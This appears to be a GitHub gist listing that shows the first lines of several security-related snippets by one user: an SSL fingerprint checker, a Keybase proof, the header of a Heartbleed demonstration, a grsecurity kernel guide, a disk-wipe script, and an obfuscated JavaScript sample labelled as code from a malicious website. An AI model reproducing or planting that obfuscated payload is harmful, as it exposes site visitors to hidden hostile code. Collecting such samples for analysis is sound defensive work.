Skip to content

Instantly share code, notes, and snippets.

@qbi
qbi / ssl-fp-check.zsh
Created September 6, 2011 21:55
Get the fingerprint of a SSL-connection via SSH from different hosts
#!/bin/zsh -fuC
# Get the fingerprint of a SSL-connection via SSH from different hosts to check
# that it's the same from everywhere, i.e. there's no or the same man in the
# middle.
ssh_local_port=13724
process_fp()
{
@qbi
qbi / keybase.md
Created March 25, 2014 00:05
keybase

Keybase proof

I hereby claim:

  • I am qbi on github.
  • I am qbi (https://keybase.io/qbi) on keybase.
  • I have a public key whose fingerprint is 60D8 5B8D 9A1C D2D1 355E BE9F 65B3 F094 EA3E 4D61

To claim this, I am signing this object:

#!/usr/bin/env python2
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
#Random generator ipv6 addresses within your ipv6 network prefix.
#!/usr/local/bin/bash
# Copyright
# Vladislav V. Prodan
# [email protected]
# 2011
array=( 1 2 3 4 5 6 7 8 9 0 a b c d e f )

Building a grsec-patched Linux kernel for Debian 8 and DigitalOcean

It's possible to run a custom (instead of hypervisor-managed) kernel for use with Debian 8.x on a DigitalOcean droplet.

We'll build one with grsecurity, "an extensive security enhancement to the Linux kernel that defends against a wide range of security threats through intelligent access control, memory corruption-based exploit prevention, and a host of other system hardening".

Note: The stable patches for Linux 3.14.x and 3.2.x are not publicly available anymore, so we'll be applying the free 4.2.x (test) patch. The URLs and filenames in this document may become outdated, so fetch the latest from grsecurity.net and kernel.org.

Install dependencies:

@qbi
qbi / wipe.sh
Created May 27, 2016 17:59 — forked from someuser89/wipe.sh
#!/bin/sh
which openssl > /dev/null || exit 1
which pv > /dev/null || exit 1
which sudo > /dev/null || exit 1
test -n "$1" || exit 2
disk="$1"
test -b "/dev/$disk" || exit 2
@qbi
qbi / wp-mal.js
Created May 20, 2019 09:19
Code from a malicious website
<
script type = 'text/javascript' >
var ttzza = ['R8OSw7rCuWPCt2NQwppQw47Cgn4=', 'w7F/OcKIw4UYwrpmw7bDr2LCiMOH', 'OkHDg8OBwrNLasOCEB4=', 'M8OBAcKqwowDw7dmUcOGw77DkA==', 'wrpiEFA=', 'wr7DlMKnB11CScOJw6ttw7E=', 'w6fDkcOLwpFLPcKOCsKwwrLDuxjCqA==', 'w7vDkzs=', 'OEXDl8OBwq9NQcOf', 'w43Cp8K/GH8=', 'JmsTUjN9', 'woDDnsOKw4U0dk4=', 'bEbDg8OJw6BMR8OfHQvChjrCrRXCqXrDlGbCp8Kze8OCwrZFwoxZOV/CsR9AKsOhwoTDnsOsQR09worDgsKOw5UyFC7Dk8K3w4rCgcK/w5LDkg=='];
(function(c, d) {
var e = function(f) {
while (--f) {
c['push'](c['shift']());
}
};
var g = function() {